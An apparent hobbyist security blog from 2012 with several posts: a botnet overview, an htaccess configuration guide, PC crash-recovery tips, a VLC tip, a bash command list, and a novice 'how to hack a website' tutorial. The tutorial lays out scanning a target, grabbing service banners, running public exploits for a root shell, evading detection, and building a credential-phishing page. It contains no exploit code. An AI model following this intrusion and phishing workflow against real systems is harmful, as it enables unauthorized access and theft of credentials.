Walk With-[Geeks]-

Botnets Explained - Part 1

2012-05-01T15:17:00.002+05:30

Botnets

The main drivers for botnets are for recognition and financial gain.

The larger the botnet, the more ‘kudos’ the harder can claim to have

among the underground community. The bot herder will also ‘rent’ the

services of the botnet out to third parties, usually for sending out

spam messages, or for performing a denial of service attack against a

remote target. Due to the large numbers of compromised machines

within the botnet huge volumes of traffic (either email or denial of

service) can be generated. However, in recent times the volumes of

spam originating from a single compromised host have dropped in order

to thwart anti-spam detection algorithms – a larger number of

compromised hosts send a smaller amount of messages in order to evade

detection by anti-spam techniques.

Botnets have become a significant part of the Internet, albeit

increasingly hidden. Due to most conventional IRC networks taking

measures and blocking access to previously-hosted botnets,

controllers must now find their own servers. Often, a botnet will

include a variety of connections and network types. Sometimes a

controller will hide an IRC server installation on an educational or

corporate site where high-speed connections can support a large

number of other bots. Exploitation of this method of using a bot to

host other bots has proliferated only recently as most script kiddies

do not have the knowledge to take advantage of it.

Several botnets have been found and removed from the Internet. The

Dutch police found a 1.5 million node botnet and the Norwegian ISP

Telenor disbanded a 10,000-node botnet. In July 2010, the FBI

arrested a 23-year old Slovenian held responsible for the malicious

software that integrated an estimated 12 million computers into a

botnet. Large coordinated international efforts to shut down botnets

have also been initiated.It has been estimated that up to one quarter

of all personal computers connected to the internet may be part of a

botnet.

Botnet lifecycle

* Bot-herder configures initial bot parameters such as infection

vectors, payload, stealth, C&C details
* Register a DDNS
* Register a static IP
* Bot-herder launches or seeds new bot(s)
* Bots spread
* Causes an increase of DDoS being sent to the slave
* Losing bots to rival botnets

Types of attacks

* Denial-of-service attacks where multiple systems autonomously

access a single Internet system or service in a way that appears

legitimate, but much more frequently than normal use and cause the

system to become busy.
* Adware exists to advertise some commercial entity actively and

without the user's permission or awareness, for example by replacing

banner ads on web pages with those of another content provider.
* Spyware is software which sends information to its creators about a

user's activities – typically passwords, credit card numbers and

other information that can be sold on the black market. Compromised

machines that are located within a corporate network can be worth

more to the bot herder, as they can often gain access to confidential

information held within that company. There have been several

targeted attacks on large corporations with the aim of stealing

sensitive information, one such example is the Aurora botnet.
* E-mail spam are e-mail messages disguised as messages from people,

but are either advertising, annoying, or malicious in nature.
* Click fraud is the user's computer visiting websites without the

user's awareness to create false web traffic for the purpose of

personal or commercial gain.
* Access number replacements are where the botnet operator replaces

the access numbers of a group of dial-up bots to that of a slave's

phone number. Given enough bots partake in this attack, the slave is

consistently bombarded with phone calls attempting to connect to the

internet. Having very little to defend against this attack, most are

forced into changing their phone numbers (land line, cell phone,

etc).
* Fast flux is a DNS technique used by botnets to hide phishing and

malware delivery sites behind an ever-changing network of compromised

hosts acting as proxies.

Preventive measures

If a machine receives a denial-of-service attack from a botnet, few

choices exist. Given the general geographic dispersal of botnets, it

becomes difficult to identify a pattern of offending machines, and

the sheer volume of IP addresses does not lend itself to the

filtering of individual cases. Passive OS fingerprinting can identify

attacks originating from a botnet: network administrators can

configure newer firewall equipment to take action on a botnet attack

by using information obtained from passive OS fingerprinting. The

most serious preventive measures utilize rate-based intrusion

prevention systems implemented with specialized hardware.

Some botnets use free DNS hosting services such as DynDns.org, No-

IP.com, and Afraid.org to point a subdomain towards an IRC server

that will harbor the bots. While these free DNS services do not

themselves host attacks, they provide reference points (often hard-

coded into the botnet executable). Removing such services can cripple

an entire botnet. Recently, these companies have undertaken efforts

to purge their domains of these subdomains. The botnet community

refers to such efforts as "nullrouting", because the DNS hosting

services usually re-direct the offending subdomains to an

inaccessible IP address.

The botnet server structure mentioned above has inherent

vulnerabilities and problems. For example, if one was to find one

server with one botnet channel, often all other servers, as well as

other bots themselves, will be revealed. If a botnet server structure

lacks redundancy, the disconnection of one server will cause the

entire botnet to collapse, at least until the controller(s) decides

on a new hosting space. However, more recent IRC server software

includes features to mask other connected servers and bots, so that a

discovery of one channel will not lead to disruption of the botnet.

Several security companies such as Afferent Security Labs, Symantec,

Trend Micro, FireEye, Simplicita and Damballa have announced

offerings to stop botnets. While some, like Norton AntiBot

(discontinued), are aimed at consumers, most are aimed to protect

enterprises and/or ISPs. The host-based techniques use heuristics to

try to identify bot behavior that has bypassed conventional anti-

virus software. Network-based approaches tend to use the techniques

described above; shutting down C&C servers, nullrouting DNS entries,

or completely shutting down IRC servers.

Newer botnets are almost entirely P2P, with command-and-control

embedded into the botnet itself. By being dynamically updateable and

variable they can evade having any single point of failure.

Commanders can be identified solely through secure keys and all data

except the binary itself can be encrypted. For example a spyware

program may encrypt all suspected passwords with a public key hard

coded or distributed into the bot software. Only with the private

key, which only the commander has, can the data that the bot has

captured be read.

Newer botnets have even been capable of detecting and reacting to

attempts to figure out how they work. A large botnet that can detect

that it is being studied can even DDoS those studying it off the

internet.

There is an effort by researchers at Sandia National Laboratories to

analyze the behavior of these botnets by simultaneously running one

million Linux kernels as virtual machines on a 4,480-node Dell high-

performance computer cluster.

- Leached from Ganja ツ and Wiki.

Later on i'll be posting some more info about Botnets. :)

Htaccess File Explained

2012-04-05T17:55:00.000+05:30

Htaccess File Explained

Intro

Hypertext Access, commonly shortened to htaccess, is a configuration file which controls the directory it is placed in and all the subdirectories underneath it. It’s an incredibly useful feature which allows webmasters to control how many aspects of their website works. You can redirect pages, change the extensions of pages, password protect directories and much much more.

In this htaccess guide I will show you some of the basic tricks and tips which will help you with your website.

So what is htaccess?

The htaccess file is a configuration file which is used on Apache based web servers to control many features of the server. The file itself is just a small basic text file and can be edited via your hosts file manager or alternatively you can download the file, edit it and reupload it.

If you have installed a script before then chances are you have had to edit the .htaccess file at one point or another. The .htaccess file gives you a lot of control and lets you easily redirect pages, password protect directories and much more. Before I go through some tutorials which show you how to use htaccess, I think it is necessary to show you how you edit the file.

Where is the .htaccess file?

The first thing you need to do is find out if your host actually lets you edit htaccess files. Because of security problems which can arise, many hosts stop their customers from editing it the .htaccess file. Therefore you should check the Frequently Asked Questions area of your host to see if you have permission to edit the file (failing that, email them).

Some operating systems may not show the .htaccess file on your computer so you may need to make sure settings show hidden files as well. Likewise some FTP Clients will not show the .htaccess file when you connect to your host so you need to make sure that your FTP is set up to show hidden files too (I personally use FileZilla and that shows .htaccess by default).

Better safe than sorry

The .htaccess gives you a lot of control over what happens on your site but accidents do happen so make sure you keep a backup or best create a copy of the htacess file of the last working .htaccess file you used before attempting to modify it in anyway. This way you can recover quickly from a site crash!

Htaccess is also extremely sensitive. A missing semi colon, incorrect letter or an extra backslash can mess everything up so you need to make sure that what you enter is correct 100%. Don’t let this scare you off though, as long as you take your time and make sure everything is input correctly you can enter just a few lines to htaccess to achieve things which most php scripts take a page to do.

To learn more about htaccess simply click on one of the articles at the right hand side. Good luck

How do you edit the .htaccess file?

Before you upload an .htaccess file to your server, make sure there is not already one there. Your host panel or perhaps a script you have uploaded may have already changed the htaccess for some reason so you don’t want to overwrite it as doing so could change something important on your site. For example, in cpanel, you can setup 301 redirects very easily but this tool is simply a script which changes the .htaccess for you. So even though you may not realise it, when you use the redirect script via cpanel, it updates your .htaccess file for you and it’s the .htaccess file which controls the redirect for you (the redirect tool just makes it easier for those who are not familar with .htaccess).

So if there is an .htaccess file there already, you want to download that and edit it before reuploading. This will ensure that nothing you have setup previously is changed.

If there is no .htaccess file there then you need to create one. Thankfully, this is very easy to do. All you need to do is open a text editor and save a blank document as .htaccess. Save the file exactly as it is stated there in bold ie. there is no writing before the extension. You need to save it as .htaccessand not htaccess.txt or document1.htaccess or whatever.

When uploading you should always :

· Upload in ASCII mode, not binary

· CHMOD the file to 644 (this isn’t absolutely necessary per say but it’s advisable, it means your server can access it but it can’t be seen via a browser).

Also, after editing your .htaccess file serveral times it may look a little complicated so I recommend adding a comment above the longer parts of code so that you know what each section is for when you look at the file again at a later date. To add a comment to the file you simply start the line with #, any code written after the # in the line will not be executed and is simply a reference for you in the future (and anyone else who may be working on your website ie. co-admin or whatever).

Htaccess Supersession

The most common place to upload an .htaccess file is the root ie. the home page of your website. This is because so many things can be controlled from the top level. However, there are many occasions when you will need to upload an .htaccess file to a sub directory. For example, if you want to password protect a directory you need to place the .htaccess file in the directory you want to protect.

The important thing to remember is that any code in a subdirectory .htaccess file supercedes the one in the directory above. However, it only supercedes it when there is a clash. I’ll explain this with an example.

Lets say your root .htaccess and your subdirectory .htaccess file both state how a 404 error should be treated. If someone tries to view a page which has been deleted within the subdirectory then the user will be redirected according to the rule stated in the subdirectory .htaccess file ie. it supercedes the htaccess on the home page. If, however, the user tries to view an incorrect url in the root directory, the root .htaccess file will dictate what will happen.

How to stop someone looking at your htaccess file

One of the first things you want to do is make sure no one tries to look at your .htaccess file. This is actually very easy to do, all you need to do is make use of the Files option.

Just enter the code below to block people seeing your .htaccess file.

# Block people seeing the htaccess file
<Files .htaccess>
order deny,allow
deny from all
</Files>

How to redirect your 404 error to a custom page

A 404 error message is the standard HTTP standard response code which is returned when the visitor cannot communicate with the server. This is a very common error on the web and it occurs when you are trying to visit a page which has either been deleted or has been moved somewhere else. For example, if you change the structure of your website and move a certain directory to a different part of your site, anyone trying to visit the old page url will get a 404 error message.

A 404 error message usually looks something like this :

Not Found

The requested URL /index.php was not found on this server.

Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.
Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7a mod_bwlimited/1.4 PHP/5.2.6 Server at yourwebsite.com Port 80

If a visitor comes to your site and sees a standard 404 error message it’s unlikely they will make the effort to see any part of your site. Therefore it is very important to create a 404 page on your site and redirect traffic from incorrect urls.

Thankfully, htaccess makes this very easy. First of all you need to create a 404 error page. So for example, you would create a page at http://www.yoursite.com/404.php which says something like :

It appears you are looking for something which isn’t there. Either you have entered an incorrect URL or we have messed up. Why not visit our home page or alternatively, search for what you are looking for in the search box below.

Whilst a 404 error page does not send the visitor to the exact page they want, it does point them in the right direction and it means they are more likely to stay on your site.

Once you have your 404 page setup, all you need to do is send visitors to incorrect url’s to this page. To do this just add the following line to your .htaccess file :

ErrorDocument 404 /404.php

You can place the 404 error template anywhere you want. For example you could place all error messages in a folder called errormessages

ErrorDocument 404 /errormessages/404.php

How to setup a 301 Redirect

A 301 HTTP response status code is a way of telling search engines that a page, pages, directory or entire website has been permanently moved to another place on the web. This is very useful if you have changed the structure of your websites url’s or if you have moved domain. You can also redirect your entire site.

Whereas a 301 code tells search engines that something has been permanently moved, a 302 code tells search engines that something has been temporarily moved. This is useful if you only want to redirect a page for a short period of time. To do a 302 redirect simply change the 301 part to 302.

You can also use 303, which is means ’seeother’ and the page has been replaced by something else. Again, to do this simply substitute 301 with 303 in the tutorials below.

How to setup a 301 Redirect

The basic code for redirecting is :

Redirect 301 old_location new_location

The old location of the file has to be the absolute path from the root of your server. The new location should use http. So for example, if you want to move a file called productreview.html from the root of your site to a subdirectory called products you would use :

Redirect 301 /productreview.html http://www.yoursite.com/products/productreview.html

How to setup a 301 Redirect

If you have moved your domain to another site you may want to redirect the whole site. To so this you simply use the following code :

Redirect 301 / http://www.newdomainname.com/

Change the Default Directory Page

When you load a directory on the web, for example www.yoursite.com or www.yoursite.com/articles/, the apache server usually looks for the index.html file. If it can’t find that it will look for index.php or index.cgi. Index.html is usually the page with the highest priority and the one which is loaded first.

It is possible to change the default directory index page. Say, for example, you wanted visitors to go to notice.html instead of index.html. All you have to add to your .htaccess file is

DirectoryIndex notice.html

This can be extended so that the server looks for other files if it cannot find the first one.

DirectoryIndex notice.html index.cgi index.php index.html

Priority goes from left to right. So the server would look for notice.html. If that file is not there it will look for index.cgi, then index.php and then index.html.

You can do to this within any directory on your site. Simply upload an .htaccess file with the above code. Remember, this will supercede the .htaccess file at the root of your domain.

Force users to use the WWW or Non-

WWW version of your domain

To avoid duplicate content in search engines you can force users to use either the www or the non-www version of your website domain. This avoids search engines such as Google indexing two versions of your domain, something which is quite common because people link to both www and on-www versions of a domain (known as the www/non-www canonical issue).

It really doesn’t matter if you use www.yoursite.com or yoursite.com. I personally use www on most sites I own however many people prefer to drop it, it’s really up to you.

Force users to use http://www.yoursite.com

To force users to use the www version of your domain all you have to do is add the following code to your .htaccess file (just replace yoursite.com with your domain name).

# Redirect non-www urls to www
RewriteEngine on
RewriteCond %{HTTP_HOST} !^www\.yoursite\.com
RewriteRule (.*) http://www.yoursite.com/$1 [R=301,L]

Alternatively you can use :

# Redirect non-www urls to www
RewriteEngine on
RewriteCond %{HTTP_HOST} ^example\.com [NC]
RewriteRule (.*) http://www.example.com/$1 [R=301,L]

Force users to use http://yoursite.com

To force users to use the non www version of your domain all you have to do is add the following code to your .htaccess file (just replace yoursite.com with your domain name).

# Redirect www urls to non-www
RewriteEngine on
RewriteCond %{HTTP_HOST} ^www\.yoursite\.com [NC]
RewriteRule (.*) http://yoursite.com/$1 [R=301,L]

Alternatively you can use :

# Redirect www urls to non-www
RewriteEngine on
RewriteCond %{HTTP_HOST} !^example\.com
RewriteRule (.*) http://example.com/$1 [R=301,L]

Notes about this technique

Many popular scripts, particular content management systems (CMS’s) edit the .htaccess file and add their own redirection so you may not have to add any of the code noted above. Infact, by adding the redirection code noted above you could actually mess things up.

For example, the popular blogging script WordPress adds redirection to the .htaccess file. You simply chose the correct domain name in the admin panel and it takes care of everything else. And if you do add the code to the .htaccess file it messes things up a little. It does still redirect non-www to www (and vice versa) but it just redirects the visitor to the home page (ie. http://yoursite.com/folder1/page1 would redirect to http://yoursite.com/ instead of http://www.yoursite.com/folder1/page1).

If this sounds a little confusing, don’t worry. Just remember that certain scripts already apply a redirection and so trying to add a redirection code to the .htaccess file can mess things up, at the very least it will unlikely work the way you want it to.

Deny a user by IP Address

There may come a time when you unfortunately need to ban someone from visiting your website completely. This is very easy to do using htaccess and can be useful if there is a spammer or disgruntled member attacking your site (something which unfortunately happens a lot to forum and blog owners).

To ban someone completely all you need to do is add the following code to your .htaccess file. Simply replace the ip address below with the ip of the person you want to ban

#ban users from visiting the site
order allow,deny
deny from 123.45.6.7
allow from all

If you want to ban more people you simply add more lines, like this :

#ban users from visiting the site
order allow,deny
deny from 123.45.6.7
deny from 987.65.4.3
deny from 56.45.34.456
allow from all

How to Stop Directory Listing

If you have a lot of files in a directory but there is no index file, your server will list all the files in that server. This can cause a lot of problems. For example, one of the most common directories which webmasters forget to hide is the images folder. This allows everyone to view all the images in their images folder. This isn’t usually a major problem though you may have more important files in a directory, perhaps important documents or software.

You can stop this from occurring from using the following code :

IndexIgnore *

The * is a wildcard and stops the server from listing any type of file. You can of course only stop certain files or file types from being listed.

For example :

IndexIgnore *.gif *.jpg *.png accounts.doc

The above code would stop all gif, jpg and png graphics files from being listed. The accounts.doc document would be blocked too however all other .doc files would be shown. Basically the IndexIgnorecommand lets you decide what files in a directory visitors can see.

You can upload an .htaccess file for every directory you want to stop people viewing but it’s more practical to place everything in your main .htaccess file (ie. your root .htaccess). To do this all you need to do is include the path to the folder(s) you want to protect.

So to block people viewing the files at www.yoursite.com/images/ and www.yoursite.com/banners/ you would the following code to your .htaccess

IndexIgnore /images/*
IndexIgnore /banners/*

Password Protect a Directory

Password protecting a directory is easy to do, all you have to do is :

1. Add some code to your .htaccess file

2. Create a file called .htpasswd

3. Select a username and generate an encrypted password and then add them to your .htpasswd file

Code to add to your Htaccess

You need to add the following code to your .htaccessfile.

AuthType Basic
AuthName "Name of your secure area”
AuthUserFile /fullpath/to/your/directory/.htpasswd
require valid-user

You need to edit the file accordingly.

· Name of your secure area = You can call this anything you want ie. Secure Area or Members Area or whatever.

· Full Path To Your Directory = This is the absolute path to the directory where your .htpasswd file is saved.

Here’s an example :

AuthType Basic
AuthName "Private Area"
AuthUserFile /home/mysite/.htpasswd
require valid-user

Create a file called .htpasswd

You create a .htpasswd file the same way you created the .htaccess file. All you need to do is create a blank document and save it as .htpasswd.

For security reasons, it is best to place this file above the root of your domain ie. place it in something like /home/mysite/ instead of /home/mysite/public_html.

Create a username and password

The username and password added to your .htpasswd file is in the format :

username:encryptedpassword

So my generated password might be something like

Kevin:nDh54k4Nc.C5c

So how do I encrypt my password in this way? Well there are a number of ways but the quickest and easiest is to use one of the many encryption sites on the web. Just use any of the scripts below to generate your encrypted password.

· htpasswd encryption

· .htpasswd Content Generator

Once you have your username and password, simply add the line to your .htaccess file. Now go and test it out and see if your directory is now password protected

Some things to note :

· To give additional users access to a directory simply add another line with a username and encrypted password

· Only the password is encrypted, the username is not encryped

~ w4r-b0y

Source

How to safeguard your files when computer crashes

2012-03-31T18:23:00.002+05:30

First thing to keep in mind: If your computer hasn't crashed yet, it will in the future! So instead of waiting for fate to strike, take some precautions now:

1) BACK-UP! Buy some decent DVD-R discs and put everything useful in them. When you have more useful stuff, backup again. Do this often.

2) Keep your computer healthy. Use an antivirus, an anti-spy, and a firewall. Keep them updated. Check regularly for Windows critical fixes.

3) Don't install software that would do dangerous things to your hard drive. A boot manager would fall in this category.

4) Use a registry cleaner before and after you install or uninstall any software. Many of the problems that will keep Windows from booting are caused by sloppy software that mess up your registry. A good registry cleaner is Tune-up Utilities.
Code:
http://www.tune-up.com/

5) Run chkdsk now and then. Go to Start> Run. Type chkdsk /F. Press enter.

In case your PC has already crashed, read the following:

Most important: Don't panic! Panic is like a little demon that whispers in your ear to format your hard drive and reinstall everything. Don't do it! You will lose all your data and the little demon will laugh at you.

To be exact you can still recover your data if you format your drive (by using special software), but only if you don't write anything on the disc afterwards. In other words format + windows install = bad idea. If you reinstall windows without formating your drive, you will only lose the files on your desktop and "My Documents" folder.

In all occasions you should make sure to safeguard your files before attempting any kind of repair!

So let's go about how to do that:

The fast way: Go to this site:

http://www.knoppix.org

Knoppix is a Linux distribution than runs from a CD. Download the Knoppix ISO and burn it. Put it in your CD drive. On startup access BIOS and change the boot sequence so that your computer boots from the CD drive. Save settings and exit. Upon reboot, Knoppix will load.

Knoppix is much like windows and it comes with its own CD burner. Locate it, launch it and backup everything you want on CD. Now you don't have to worry anymore!

The less fast way: This requires that you have access to a second PC. Open the case of your computer and remove the hard disk.

Install it as a slave on the second PC.

Depending on respective configurations, you may have to change some jumper settings on the drive. Read the manual for help with installing hard drives and setting jumpers.

After this is done, boot the second PC. If everything went out ok, you should be able to access your drive without problems. (Edit: Note that Win98 cannot recognize a local NTFS (Win2K/XP) disk.)

Copy everything you need from your own hard drive to the other one. Now you don't have to worry anymore!

Replace your computer's hard disk, fix all problems and reverse the process to copy the data back to your computer, or take CD backups on the other PC. :)

Enjoy..!! :)

w4r-b0y

How to hack a website[N00b Friendly]

2012-03-20T16:07:00.001+05:30

So say somehow somewhere we ended up choosing a target to start wreaking havoc upon. All we need is an IP Address. Theres plenty of papers out there that go into how to obtain an IP Address from the preferred mark of your choice. So I'm not going to go into that subject. Alright so say we got the targets IP Address finally. What do we do with this IP Address. Well first ping the IP Address to make sure that its alive. In otherwords online. Now at the bottom of this document ill include some links where you can obtain some key tools that may help on your journey through the electronic jungle. So we need to find places to get inside of the computer so we can start trying to find a way to "hack" the box. Port Scanners are used to identify the open ports on a machine thats running on a network, whether its a router, or a desktop computer, they will all have ports. Protocols use these ports to communicate with other services and resources on the network.

1) Blues Port Scanner - This program will scan the IP address that you chose and identify open ports that are on the target box.

Example 1:
Idlescan using Zombie <Domain Name> (192.150.13.111:80); Class: Incremental
Interesting ports on 208.225.90.120:
(The 65522 ports scanned but not shown below are in state: closed)
Port State Service
21/tcp open ftp
25/tcp open smtp
80/tcp open http
111/tcp open sunrpc
135/tcp open loc-srv
443/tcp open https 1027/tcp open IIS
1030/tcp open iad1
2306/tcp open unknown
5631/tcp open pcanywheredata
7937/tcp open unknown
7938/tcp open unknown
36890/tcp open unknown

In example 1 now we see that there are a variety of ports open on this box. Take note of all the ports that you see listed before you. Most of them will be paired up with the type of protocol that uses that port (IE. 80-HTTP 25-SMTP Etc Etc...) Simply take all that information and paste it into notepad or the editor of your choice. This is the beginning of your targets record. So now we know what ports are open. These are all theoretical points of entry where we could wiggle into the computer system. But we all know its not that easy. Alright so we dont even know what type of software or what operating system that this system is running.

2) NMAP - Port Scanner - Has unique OS fingerprinting methods so when the program sees a certain series of ports open it uses its best judgement to guess what operating system its running. Generally correct with my experiences.

So we have to figure out what type of software this box is running if we are gonna start hacking the thing right? Many of you have used TELNET for your MUDS and MOOS and weird multiplayer text dungeons and many of you havent even heard of it before period. TELNET is used to open a remote connection to an IP Address through a Port. So what that means is we are accessing their computer from across the internet, all we need is their IP Address and a port number. With that record you are starting to compile, open a TELNET connection to the IP Address and enter one of the OPEN ports that you found on the target.
So say we typed 'TELNET -o xxx.xxx.xxx.xxx 25' This command will open up a connection through port 25 to the IP xxx.xxx.xxx.xxx. Now you may see some text at the very top of the screen. You may think, well what the hell, how is that little string of text going to help me. Well get that list you are starting to write, and copy the banners into your compilation of the information youve gathered on your target. Banners/Headers are what you get when you TELNET to the open ports. Heres an example of a banner from port 25.

220 jesus.gha.chartermi.net ESMTP Sendmail 8.12.8/8.12.8; Fri, 7 Oct 2005 01:22:29 -0400

Now this is a very important part in the enumeration process. You notice it says 'Sendmail 8.12.8/8.12.8' Well what do ya know, we now have discovered a version number. This is where we can start identifying the programs running on the machine. There are some instances in which companies will try and falsify their headers/banners so hackers are unable to find out what programs are truly installed. Now just copy all the banners from all the open ports *Some Ports May Have No Bannners* and organize them in the little record we have of the target. Now we have all the open ports, and a list of the programs running and their version numbers. This is some of the most sensitive information you can come across in the networking world. Other points of interest may be the DNS server, that contains lots of information and if you are able to manipulate it than you can pretend to hotmail, and steal a bunch of peoples email. Well now back to the task at handu. Apart from actual company secrets and secret configurations of the network hardware, you got some good juicy info. http://www.exploit-db.com is a very good resource for looking up software vulnerabilities. If you cant find any vulnerabilities there, search on google. There are many, many, many other sites that post vulnerabilities that their groups find and their affiliates.

At SecurityFocus you can search through vendor and whatnot to try and find your peice of software, or you can use the search box. When i searched SecurityFocus i found a paper on how Sendmail 8.12.8 had a buffer overflow. There was proof of concept code where they wrote the shellcode and everything, so if you ran the code with the right syntax, a command prompt would just spawn. You should notice a (#) on the line where your code is being typed. That pound symbol means that the command prompt window thats currently open was opened as root. The highest privilage on a UNIX/Linux Box. You have just successfully hacked a box. Now that you have a command shell in front of you, you can start doing whatever you want, delete everything if you want to be a fucking jerk, however I dont recommend that. Maybe leave a text file saying how you did it and that they should patch their system.....whoever they are. And many times the best thing you can do is just lay in the shadows, dont let anyone know what you did. More often than not this is the path you are going to want to take to avoid unwanted visits by the authorities.

There are many types of exploits out there, some are Denial of Service exploits, where you shut down a box, or render an application/process unusable. Called denial of service simply because you are denying a service on someones box to everyone trying to access it. Buffer Overflow exploits are involved when a variable inside some code doesnt have any input validation. Each letter you enter in for the string variable will be 1 byte long. Now where the variables are located at when they are in use by a program is called the buffer. Now what do you think overflowing the buffer means. We overflow the buffer so we can get to a totally different memory address. Then people write whats called shellcode in hex. This shellcode is what returns that command prompt when you run the exploit. That wasnt the best description of a buffer overflow, however all you need to remember is that garbage data fills up the data registers so then the buffer overflows and allows for remote execution of almost every command available. There are many, many other types of attacks that cannot all be described here, like man-in-the-middle attacks where you spoof who you are. Performed correctly, the slave will enter http://www.bank.com and his connection will be redirected to your site where you can make a username and password box, make the site look legit. And your poor mark will enter their credentials into your site, when they think its really http://www.bank.com. You need to have a small script set up so it will automatiically display like an error or something once they try and log in with their credentials. This makes it seem like the site is down and the slave doenst give it a second thought and will simply try again later.

_________________________________________________________________________

So as a summary of how to 0wn a box when you only have an IP Address
Method Works On BOTH Linux and Windows.

****You can do the same with domain names (IE google.com) than what you can with IP Addresses. Run a WHOIS Lookup or something along those lines. Or check up on InterNIC you should be able to resolve the domain name to an IP address.****

- Port Scan The Address And Record Open Ports
- Telnet To Open Ports To Identify Software Running On Ports

3) netcat - Network swiss army knife. Like TELNET only better and with a lot more functionality. Both can be used when you are trying to fingerprint software on open ports

- Record Banners And Take Note Of The Application Running and The Version Number
- Take A Gander Online At SecurityFocus.com or Eeye.com. If you cant find any vulnerabilities then search google.
- Make a copy of some Proof-Of-Concept code for the vulnerability.

*Read the documentation if there is any, for the proof-of-concept code you will be using for your exploit*

- Run The Exploit Against The slave.
- Reap The Cheap-Sh0t Ownage

__________________________________________________ _______________
**This document does not go into covering your tracks. If you dare try any of this stuff on a box you dont have consent to hack on, They will simply look at the logs and see your IP Address and then go straight to your ISP. Once you get more 1337 you get to learn how to get away with the nasty deeds. This is what the majority of kode-kiddies do when they perform attacks. The key is to enumerate all the info you can from the machine, the more info you have on the system the better. User accounts can also be enumerated. Once you have a list of account names, you may then proceed to brute-force or perform a cryptanalysis attack to gain control of the account. Then you must work on privilage escalation. Users are not Admins/Root**

Thanx to Skittles- for this lovely tutorial. :)

How to edit meta tags of Media files using VLC Player

2012-03-19T13:37:00.000+05:30

How to edit meta tags of audio and video files using VLC Player.

What are meta tags..??

In simple words, Audio and Video files contains some information about Title, Artist, Album, Genre, Date, Publisher, and more..

There are many meta tag editor available. But here is the way to edit them with VLC media player which is very popular media player at this time.

VLC media Player can be used to edit meta tags of both audio files as well as video files. :)

So, here is the way, just follow these simple steps:-

1) Open the media file in VLC Media Player and Click on Tools>>Media Information.

2) Thats it.!!Now you can edit all the meta tags and save them.

Alternative Method:-

There are many tools available out all over the internet, I found a tool named Mp3 Tag Editor which is Good to Edit MP3 file's meta tag. Download It here.

But VLC Media Player can edit almost every Audio and video file's Meta Tags.

Enjoy..!!!

Some Basic Bash Commands

2012-03-18T12:30:00.000+05:30

List of Some Basic BASH Commands:-

I'd like to point out to everyone before reading that this list is very far from completion and does not include all of the extendable possibilities. When I say this, nmap isn't a built-in command until you install nmap. These commands just stand for those that come with a Linux/UNIX BASH installation.

A

adduser Add a user to the system
addgroup Add a group to the system
alias Create an alias •
apropos Search Help manual pages (man -k)
apt-get Search for and install software packages (Debian)
aspell Spell Checker
awk Find and Replace text, database sort/validate/index

B

basename Strip directory and suffix from filenames
bash GNU Bourne-Again SHell
bc Arbitrary precision calculator language
bg Send to background
break Exit from a loop •
builtin Run a shell builtin
bzip2 Compress or decompress named file(s)

C

cal Display a calendar
case Conditionally perform a command
cat Display the contents of a file
cd Change Directory
cfdisk Partition table manipulator for Linux
chgrp Change group ownership
chmod Change access permissions
chown Change file owner and group
chroot Run a command with a different root directory
chkconfig System services (runlevel)
cksum Print CRC checksum and byte counts
clear Clear terminal screen
cmp Compare two files
comm Compare two sorted files line by line
command Run a command - ignoring shell functions •
continue Resume the next iteration of a loop •
cp Copy one or more files to another location
cron Daemon to execute scheduled commands
crontab Schedule a command to run at a later time
csplit Split a file into context-determined pieces
cut Divide a file into several parts
D
date Display or change the date & time
dc Desk Calculator
dd Convert and copy a file, write disk headers, boot records
ddrescue Data recovery tool
declare Declare variables and give them attributes •
df Display free disk space
diff Display the differences between two files
diff3 Show differences among three files
dig DNS lookup
dir Briefly list directory contents
dircolors Colour setup for `ls'
dirname Convert a full pathname to just a path
dirs Display list of remembered directories
dmesg Print kernel & driver messages
du Estimate file space usage

E

echo Display message on screen •
egrep Search file(s) for lines that match an extended expression
eject Eject removable media
enable Enable and disable builtin shell commands •
env Environment variables
ethtool Ethernet card settings
eval Evaluate several commands/arguments
exec Execute a command
exit Exit the shell
expect Automate arbitrary applications accessed over a terminal
expand Convert tabs to spaces
export Set an environment variable
expr Evaluate expressions

F

false Do nothing, unsuccessfully
fdformat Low-level format a floppy disk
fdisk Partition table manipulator for Linux
fg Send job to foreground
fgrep Search file(s) for lines that match a fixed string
file Determine file type
find Search for files that meet a desired criteria
fmt Reformat paragraph text
fold Wrap text to fit a specified width.
for Expand words, and execute commands
format Format disks or tapes
free Display memory usage
fsck File system consistency check and repair
ftp File Transfer Protocol
function Define Function Macros
fuser Identify/kill the process that is accessing a file

G

gawk Find and Replace text within file(s)
getopts Parse positional parameters
grep Search file(s) for lines that match a given pattern
groups Print group names a user is in
gzip Compress or decompress named file(s)

H

hash Remember the full pathname of a name argument
head Output the first part of file(s)
help Display help for a built-in command •
history Command History
hostname Print or set system name

I

id Print user and group id's
if Conditionally perform a command
ifconfig Configure a network interface
ifdown Stop a network interface
ifup Start a network interface up
import Capture an X server screen and save the image to file
install Copy files and set attributes

J

join Join lines on a common field

K

kill Stop a process from running
killall Kill processes by name

L

less Display output one screen at a time
let Perform arithmetic on shell variables •
ln Make links between files
local Create variables •
locate Find files
logname Print current login name
logout Exit a login shell •
look Display lines beginning with a given string
lpc Line printer control program
lpr Off line print
lprint Print a file
lprintd Abort a print job
lprintq List the print queue
lprm Remove jobs from the print queue
ls List information about file(s)
lsof List open files

M

make Recompile a group of programs
man Help manual
mkdir Create new folder(s)
mkfifo Make FIFOs (named pipes)
mkisofs Create an hybrid ISO9660/JOLIET/HFS filesystem
mknod Make block or character special files
more Display output one screen at a time
mount Mount a file system
mtools Manipulate MS-DOS files
mv Move or rename files or directories
mmv Mass Move and rename (files)

N

netstat Networking information
nice Set the priority of a command or job
nl Number lines and write files
nohup Run a command immune to hangups
nslookup Query Internet name servers interactively

O

open Open a file in its default application
op Operator access

P

passwd Modify a user password
paste Merge lines of files
pathchk Check file name portability
ping Test a network connection
pkill Stop processes from running
popd Restore the previous value of the current directory
pr Prepare files for printing
printcap Printer capability database
printenv Print environment variables
printf Format and print data •
ps Process status
pushd Save and then change the current directory
pwd Print Working Directory

Q

quota Display disk usage and limits
quotacheck Scan a file system for disk usage
quotactl Set disk quotas

R

ram ram disk device
rcp Copy files between two machines
read Read a line from standard input •
readarray Read from stdin into an array variable •
readonly Mark variables/functions as readonly
reboot Reboot the system
rename Rename files
renice Alter priority of running processes
remsync Synchronize remote files via email
return Exit a shell function
rev Reverse lines of a file
rm Remove files
rmdir Remove folder(s)
rsync Remote file copy (Synchronize file trees)

S

screen Multiplex terminal, run remote shells via ssh
scp Secure copy (remote file copy)
sdiff Merge two files interactively
sed Stream Editor
select Accept keyboard input
